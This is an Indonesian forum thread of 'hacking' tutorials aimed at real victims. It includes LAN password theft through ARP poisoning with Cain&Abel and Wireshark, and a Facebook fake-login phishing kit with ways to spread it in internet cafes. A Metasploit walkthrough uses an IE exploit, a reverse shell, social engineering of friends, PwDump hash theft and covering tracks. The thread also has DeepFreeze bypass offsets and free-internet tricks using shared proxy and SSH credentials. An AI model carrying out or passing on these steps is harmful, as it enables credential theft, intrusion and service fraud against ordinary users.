disini kita hanya membahas soah hacking2 ok
hacking craking
(32 posts) (1 voice)-
MEMONOPOLI BANDWIDTH DENGAN BROWSER MOZILLA FIREFOX
1). Buka Browser Mozilla Firefox…
2). Pada Address Bar Ketik : ABOUT:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah "TRUE")
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih "Toggle"
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False
4). buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan NEW>>INTEGER
5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH atau Tekan F5
7). Pada Address Bar Ketik : ABOUT:BLANK
. Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
10).Kemudian Tekan OK Lalu REFRESH ( F5 )
11).Masuk Ke Link Ini :
https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&id=125
atau :
https://addons.mozilla.org/extensions/moreinfo.php?id=125&applicationfiltered=firefox
12).Download Software SwitchProxy Tool Versi 1.3.4
13).Setelah Selesai Jangan Tekan Tombol UPDATE
14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15).Tutup Semua Browser Mozilla FireFox,
16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi
17).Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.
Posted 4 months ago # -
Cara Mudah Hacking di LAN (Local Area Network)
Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)
Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsiPerbedaan antara jaringan Hub dan Switch:
* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.
Hacking ini menggunakan teknik:
* Sniffing
* ARP Poison RoutingKedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda
Kelebihan:
* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya freeKekurangan:
* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab sayaMulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
* Komputer Korban
* Komputer Hacker
* ServerPerbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:http://www.wireshark.org/download.html
http://www.oxid.it/cain.htmlCara Menggunakan WireShark:
* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknyaCara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.Cara Menggunakan Cain&Abel:
1. * Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.
Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)
Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).
Posted 4 months ago # -
hacking facebook dengan login palsu [fakelogin]
facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun.
hampir-hampir saja facebook diharamkan.sesudah saya posting tentang cara login palsu di friendster, hari ini saya posting tentang cara membuat login palsu di facebook.
belum baca cara buat login palsu di friendster? baca dahulu disinioke langsung saja.
1. silahkan anda daftar di http://www.700megs.com
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
bila tidak bisa terdaftar langsung saja masuk di :
http://www.700megs.com/register.jsp2. setelah anda berhasil mendaftar di 700megs.com masuk ke FILE MANAGER...hapus file index.html.(akan ada di Cpanel masing2 nantinya)
3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di 700megs.com yang tadi anda sudah daftar.5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]6, alright! selesai sampai di sini. . .
untuk penyebarannya silahkan dengan cara masing2...
disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di http://www.700megs.com kalian..ambil URL nya.. [penting]terus untuk pengguna firefox: buka tools>option>main
preview:
http://i410.photobucket.com/albums/pp190/eta_rrrrock/kidego1.jpgdisni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.atau..
bisa juga menyebarkan dengan cara seperti ini
http://i410.photobucket.com/albums/pp190/eta_rrrrock/32.jpg
kamu buat account baru,di yahoo,gmail,ato sejenisnya
dengan nick Facebook@ or something like that.
diatas cm contoh...silahkan kamu buat seni sendiri
enjoy..mudahkan ??
semoga berhasil . . .
Posted 4 months ago # -
Cara Membobol / Membuka password file rar dan zip
Pernakah kamu mendownload file besar, seperti contohnya game berexstensi rar dan ternyata disitu meminta untuk memasukan password ? pasti jengkel sekali !!tenang saja password tersebut bisa kita buka.
dengan aplikasi RarCrack kita bisa mebobolnya / membukanya.Biasanya di internet memang ditawarkan download software pembuka zip,rar,7Zip yang terkunci, namun kita wajib mengeluarkan biaya, paling tidak mereka hanya menawarkan program trial yang ada expire datenya. Tetapi jika kamu adalah pengguna Linux (kalau kamu tidak punya Linux, silahkan file tersebut bawa kepada teman kamu yang mempunyai OS Linux dan ekstrak di komputernya, kemudian transfer file-file tersebut ke USB dan bawa pulang.
RarCrack adalah solusi yang bagus sebagai cara membuka file zip,rar,7zip yang terproteksi password.
Utility kecil yang bernama RarCrack dijalankan dengan command line.
silahkan didownload disini atau http://sourceforge.net/projects/rarcrack/ secara gratis atau freeware. Dengan metode brute-force algoritma, RarCrack dapat dengan cerdas membongkar sandi rahasia file rar, atau zip yang terkunci.
Cara menggunakannya :
RarCracknya dijalan terlebih dahulu.. Kemudian Drag (pindahkan)File Zip, Rar, 7Zip yang di pasword ke dalam RarCrack..
selesai . . .@ingat
aplikasi ini hanya dapat bekerja di linux saja.Posted 4 months ago # -
Tips mudah untuk Hack / Cheat Travian online
Travian adalah Jerman berbasis browser permainan yang mungkin salah satu yang paling sukses di luar sana saat. Saat ini ada lebih dari 3 juta pemain di seluruh dunia.Travian
Travian Indonesia Online juga memberikan permainan pasar yang sangat goo dampak. Terdapat lebih dari 5000 pemain online yang terakhir kali saya diperiksa. Saya rasa ini dapat dianggap sebagai salah satu game online di sekitar jaringan.Saya membuat sebuah ID dan ada tes untuk beberapa saat, sehingga saya menemukan beberapa bug s cara / tips (cheats) untuk memberikan keuntungan bermain Travian.
1. Periksa apakah anda pemain lawan yang online atau tidak
Keberhasilan tingkat cheat ini sangat bagus. I tried it myself ke tetangga saya player. Dan saya menilai keberhasilan menentukan apakah mereka sedang online atau tidak, hampir 100% bekerja.
Untuk melakukannya, Anda hanya perlu mengirimkan pesan ke lawan. Dan setelah beberapa menit, klik pesan terkirim item.
untuk jelasnya lihat gambar di :
http://zoiz.web.id/images/online.jpgTeks dalam kotak merah berarti 'belum dibaca'. Jika sudah tidak ada pemberitahuan (yang belum dibaca status) beberapa jam setelah Anda mengirim pesan, berarti anda lawan yang sedang online.
Tapi meskipun status belum ada, Anda mungkin tidak akan lawan secara offline pada saat ini. Tetapi sebagian besar waktu, orang akan membaca pesan yang masuk segera J nice Travian Hack bukan?
2. Menggunakan Travian (Cheat / Hacking) Softwares
GreaseMonkey Mozilla Firefox adalah sebuah add-on yang memungkinkan Anda untuk menyesuaikan cara menampilkan sebuah halaman web menggunakan JavaScript bit kecil. GreaseMonkey dapat didownload https://addons.mozilla.org/en-US/firefox/addon/748
Dan anda perlu mencari sesuai travian script dari mesin pencari seperti
Google, menggunakan kata kunci "Travian Script" atau yang lain. Anda mungkin ke tanah http://userscripts.org.Mereka menyediakan berbagai travian script yang akan membantu Anda banyak bermain Travian. Anda dapat seperti antrian karena banyak tugas sebagai Travian bahkan mungkin jika anda tidak memiliki 'Travian Plus' diaktifkan.
Sebelum menginstal script, hanya pastikan GreaseMonkey add-on diaktifkan. Dan klik pada tombol INSTALL UserScripts.org disediakan untuk menginstal.
Posted 4 months ago # -
Hacking Windows XP SP2 di LAN
Setelah mengetahui sedikit dan konsep dasar ?standar? mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare ( http://chaidir.wordpress.com/2006/11/14 ... vmware.com )untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.Tools yang saya gunakan adalah Metasploit Framework ( http://chaidir.wordpress.com/2006/11/14 ... vmware.com ) untuk melakukan exploit serta PwDump6 ( http://www.foofus.net/fizzgig/pwdump/ ) untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.
Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ?limited user? tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3 ( http://metasploit.com/projects/Framework/msf3/ ), kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.
Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin ( http://www.cygwin.com/ ) untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!
Pertama2 jalankan ?mfsconsole?!
Image
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ?help?.
Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution ( http://www.microsoft.com/technet/securi ... 6-055.mspx ).
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :
msf > info ie_vml_rectfill
Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ?social engineering?, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ?bekerja?. Setelah beberapa saat bilang aja ?wah.. ada error nih. Ok deh.. saya coba betulin dulu? makasih ya?. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-?end process?-kan ?dumpred.exe? juga, tapi setelah exploit bekerja ).
Untuk menggunakan exploit gunakan perintah2 berikut dalam console :
msf > use_ie_vml_rectfill
msf > set PAYLOAD win32_reverse
msf > set RHOST ip_target
msf > set LHOST ip_penyerang
msf > exploit
Hasilnya akan tampak seperti gambar berikut :
Image
Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ?payload? yang digunakan adalah ?win32_reverse? dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ?exploit?, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus
Jika anda berhasil, maka anda akan mendapatkan ?cmd.exe? dari komputer target.
Crack da Password!
Nah, setelah kita ?menguasai? komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ?menyediakan? program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ?biasa?, pwdump tidak akan berhasil!
Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ?$? biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ?net use?. Contoh perintah yang digunakan :
Image
Setelah itu copy Pwdump ke komputer target dalam folder sementara, ?temp?. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah
C:\temp\Pwdump ?o pass.txt 127.0.0.1
Klo berhasil akan tampak pada gambar berikut.
Image
Lalu copy file pass.txt ke komputer kita
C:\temp\copy pass.txt z:
Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.
Image
Nah, udah dapet hash file nya kan. Tinggal di crack aja deh?. (baca artikel sebelumnya buat nge-crack password). ( http://chaidir.wordpress.com/2006/09/24 ... -passwords )
Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ?menyenangkan? untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.
Happy Hacking?..
Beberapa saran agar windows kita tetap aman terhadap exploit diatas.
1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.
2. Patch Windows anda.
3. Gunakan antivirus dengan update terbaru
4. Hati2 terhadap teman anda sendiri.. waspadalah!!
Posted 4 months ago # -
Cara UN-Freeze DeepFreeze (menonaktifkan DeepFreeze)
Penulis tidak bertanggung jawab akan kerusakan atau kerugian yang
ditimbulkan akibat penggunaan ataupun
pelaksanaan tutorial ini. Tutorial ditujukan untuk mereka yang mau
belajar bukan untuk mereka yang ingin
merusak bahkan merugikan orang lain dengan tindakannya.Anyway, Let's
Get It on!!!!$>DeepFreeze adalah salah satu Software yang digunakan untuk
mengamankan, mencegah dan mengontrol komputer
dari pengerusakan yang dilakukan sengaja ataupun tidak sengaja.
Sesuai dengan namanya software ini akan "Membekukan" segala yang ada di
partisi "beku"nya.
Tidak ada "Restriction" dalam penggunaan komputer yang "dibekukan",
hanya saja semua settingan, dan kondisi
komputer akan kembali seperti semula setelah komputer di-restart /
booting.
$>Tutorial ini akan membahas tentang cara Disable/Un-freeze DeepFreeze
versi 4.20.020.0598, 4.20.120.0598,
4.20.121.0613, 5.20.220.1125 dan 5.30.120.1181 pada OS Windows 2K/XP.$>Pada umumnya DeepFreeze mempunyai aplikasi yang aktif di komputer
yang masih "Enable", dan bila kita ingin
mengubah setingan dari DeepFreeze maka harus masuk ke menu Config yang
diproteksi oleh password tentunya.
$>Ada beberapa cara untuk men-Disable software ini, yaitu dengan
menggunakan disket (bootable tentunya)
lalu boot dari disket itu dan memindahkan file DFSERVEX.EXE yang berada
di path c:\progra~1\hypert~1\deepfr~1
ke tempat lain. Dan yang terakhir yaitu dengan menggunakan Disassembler
untuk mem-Patch File Frzstate(2K).exe.
Tutorial ini akan membahas cara yang kedua.Tools yang diperlukan :
1.Ollydbg 1.10 > http://www.ollydbg.de/
2.Process Explorer > http://www.sysinternals.com/
3.Ollyscript > http://ollyscript.apsvans.com/
4.ASPack 2.12 OEP finder script by hacnho/VCT2k4 >
http://ollyscript.apsvans.com/Langkah-langkah :
1.Jalankan Process Explorer lalu lihat aplikasi Frzstate.exe atau
Frzstate2k.exe yang berjalan lalu klik kanan
untuk melihat propertiesnya. Catat Properties Command Linenya yang
berisi path program itu dan 3 angka terakhir.
contoh : C:\Program Files\HyperTechnologies\Deep
Freeze\_$Df\FrzState.exe 1 1066917 0 <<>Appearance>Plugi-in Path
5.Jalankan Script EOP di menu Plugins>Run Script>Ollyscript tentukan
path dari EOP script lalu klik Open.
6.Setelah itu script akan membuka code asli. Perhatikan apakah ada ikon
dfreeze di system tray (DFreeze dapat diset-
untuk tidak menampilkannya),bila tidak ada klik kanan pada jendela
code pilih Go to>Expression dan masukkan nilai
berikut :
versi 4.20.020.0598 > 40A2BE
versi 4.20.120.0598 > idem
versi 4.20.121.0613 > 409F4A
versi 5.20.220.1125 > 40FC4A
versi 5.30.120.1181 > idem
dan klik Ok. Setelah itu program akan menuju ke baris tersebut. Klik
kanan lagi pilih Assemble lalu isi kolom dengan
ekspresi NOP dan jangan lupa checklist pilihan Fill with NOP's lalu
klik Assemble.
7.Kembali lagi ke jendela code, klik kanan untuk memilih Go to dan isi
dengan nilai berikut :
versi 4.20.020.0598 > 40368D
versi 4.20.120.0598 > idem
versi 4.20.121.0613 > 4034F5
versi 5.20.220.1125 > 4037E9
versi 5.30.120.1181 > 4037E9
lalu kilk Ok. Program akan menuju baris tersebut. Kita akan membuat
sebuah BreakPoint disini.
8.Klik kanan pilih Breakpoint>Toogle, lalu tekan F9 untuk eksekusi
baris tersebut. Bila benar akan muncul 2 ikon
Deepfreeze pada system tray. Pilihlah salah satu ikon tersebut dan
tekan Shift+dobel klik atau ctrl+Shift+Alt+F6
untuk membuka Form Login DFreeze. Isi kolom password dengan apa saja
allu klik OK atau Enter.
9.Jika ikon yang kita pilih benar maka form Login tersebut seolah-olah
"Membeku". Kembali ke jendela code di Ollydbg
tekan F8 dan lihat jendela register di sebelah kanan, ganti isi
register EAX dengan nilai 1 (dalam hexadesimal) dengan
dobel klik di register tersebut. (nilai 000000000 merupakan value
"False" untuk pengecekan password)
10.Tekan F9 untuk eksekusi program lagi, bila benar maka kita akan
mendapatkan sebuah form Config dari DeepFreeze.Posted 4 months ago # -
trik internet'an gratis dengan kartu CDMA
sesuai banyak yang request .
ada yang terbaru lagi nee untuk mengaakali biar internet gratis .
hehehehehehehe .
orang indonesiakan maunya gratisan kaya gw . .
ne patut dicoba .Gratisan StarOne
parameter yang digunakan untuk koneksi dgn chip StarOne,
nomor dial = #777
username/login= wap
password= wap
jika anda menggunakan mozilla pilih Tool=>option=>advanced=>network=>setting=>pilih manual proxy configuration, kemudian masukkan proxy berikut :
http proxy: 66.29.36.95 port: 554 atau 1745
tinggal daftar di http://pps.nntime.com/
kemudian centang use this proxy for all protocol.
proxy ini bagus karena bisa membuka halaman2 dengan ssl 128 bit seperti yahoomail,e-gold, gmail, internet banking, dan semuanya, tentu saja bisa membuka halaman friendster yang menjadi kegemaran anda
lakukan dial cdma anda, kemudian mulailah browsing….
good luck.Gratisan Esia
Anda bisa menggunakan operator Luar Negeri. Isikan Proxy Anda dengan 129.82.12.187 / 216.165.109.82 dan Port 3128/3124/3127 (pilih salah satu),
atau
200.63.213.2 /66.29.36.95 (username cari di http://pps.nntime.com/) /
dengan port 554Yang perlu kalian lakukan cuma rubah setting proxy di browser kalian.
Gratisan Esia (alternatif)
Beli kartu Esia paket untung, terus pake internetan aja , nah so pasti berkurang kan pulsanya nah itu wajar, nanti klo udah sampe pulsa Rp. 0 dia bakal bisa terus, tapi mendingan si abisin dulu aja pulsanya buat telponan klo dah Rp. 0 baru deh pake internetan ini.
so caranya dengan settingan:
login dial up
username : esia /wifone/wimode
pass : esia/wifone/wimode
username ama paswordnya ya pilih salah satu aja, semuanya bisa, nah setelah masuk ke internetnya kita harus pake proxy, masukin proxynya lewat mozilla klik tools , lalu options, lalu advance, network, dan setting kemudian isi manual proxy dengan 200.63.213.2 dengan port 554 uda deh tinggal buka website dan bisa, kelemahan koneksi suka putus-putus dan agak lama, kalo mau agak cepet ya musti cari proxy lain di google banyak, atau jika anda menggunakan mozilla pilih Tool=>option=>advanced=>network=>setting=>pilih manual proxy configuration, kemudian masukkan proxy berikut :
http proxy: 66.29.36.95 port: 554kemudian centang use this proxy for all protocol.
pada saat awal browsing anda akan dimintai username dan password,
anda bisa membuat username sendiri di sini
atau kalau ingin yang full bisa beli sendiri
Gratisan Esia (Alternatif 2)
Beli perdana esia Siul
Download proxifier ada di sini http://rapidshare.com/files/66124802/Proxifier.zip
pass : xteamweb.comUser dan pass standart aja pke user dan pass wimode juga bisa Riang Riang Riang Riang
Kalo udah setting proxifier
Option -->> setting proxy -->> add --> masukin proxy xteam port 554 -->> ceklist HTTPS -->> masukin user dan password masing-masing yang di kasih sama mimin
xteam proxy : 72.55.165.86 port 554, user name : internet untuksemua, pass : berubah-ubah sih, bisa dilihat update-nya di http://internetuntuksemua.blogspot.c...ate-proxy.html. Di situ selalu diupdate passwordnya jika ada perubahan dari X-Team.
Options -->> Name Of Resolution -->> pilih yang remotely di ceklist
Gratisan Smart
Setting MyEnTunnel :
====================
SSH Server : 68.178.172.19 SSH Server : 72.55.165.86
SSH Port : 80 (ini sudah tetap) SSH Port : 8080Username : anjing Username : internetuntuksemua
Pass : buduk Pass : free4u
Centang : - Reconnect on Failure
- Use Private Key
- Verbose Logging
- Enable Slow Polling
- Infinite Retry Attempts
- Enable Dyanamic SOCKS Port 80 (ini yang bisa kita rubah-rubah jadi 20 dsb)
- Hide Port Connections
- Enable Compression
- Retry Delay 1
- Disable NotificationsPilihan Port lainnya : 20, 443,554,3124,3127, 7999,8000,8088,8888 and 9201
Browser Settings :
==================
yang diisi cuma SOCKS dengan localhost port 80Dial Up Settings :
==================
paling cocok untuk SMART (lalu ESIA)...
SMART username cdma pass cdma #777
ESIA username esia pass esia #777Gratisan Smart (alternatif)
Gunakan proxy 10.17.27.250 port 8080username : cdma
password : cdma
dial : #777
smart pakai port 8080,80,8000.Gratisan Smart (Alternatif)
Meski internet gratis esia sudah tidak jalan, namun bagi cdma user masih ada pilihan lain untuk bisa menggunakan akses internet gratis. Salah satunya adalah internet gratis smart dengan menggunakan proxy 10.17.27.250:8080. Sebenernya, untuk bisa mendapat koneksi maksimal, kita ga perlu repot-repot, cukup memodifikasi sedikit dari trik internet gratis esia yg sudah pernah dibahas, bisa ngacir bebas hambatan.Pertama, dial smart-mu
Kedua, buka PuTTY lalu set proxy 10.17.27.250:8080 pada tab proxy. lalu pada bagian ssh pilih tunnel dan masukkan source port sesuai keinginan dan centang “dynamic”nya.
ketiga, masukkan IP free ssh account yg telah di share sebelumnya pada bagian hostname, lalu masukkan port ssh nya dengan port 80.
keempat, jalankan ssh tunnel lewat PuTTY kemudian buka proxifier dan set socks proxy hasil dari ssh tunnel disana.
kelima, restart proxifier and done !!!
FYI, sampai saat gw posting, trik ini masih bisa jalan. ga tau nanti, esok ato lusa .. heuheuheue.. good luck ajah poko’e……
Gratis dengan Flexi
Total murah Flexi (setengah gratisan lho, yang mbayar cuma upload nya)
Langsung Aja kita setting internet gratisnya….!1. Pastikan sinyal Flexi di daerahmu bagusss….
2. Install program Your-Freedom di komputermu.
3. Habis install, jangan di jalankan dulu Your-Freedomnya.
4. Koneksikan komputermu dengan internet (#777, telkomnet@flexi, telkom).
5. Kalau sudah Connect, jalankan Your-Freedom.
6. Klik tab Ports dan klik checkbox Shock 4/5 Port 1080 dan klik checkbox Web Proxy Port 8080 .
7. Kembali klik tab Status, dan kemudian klik Configure.
8. Pada bagian Server Connection isi dengan ems09.your-freedom.de dan pada kotak bawah yang http ganti dengan udp otomatis portnya akan diganti dengan 53.
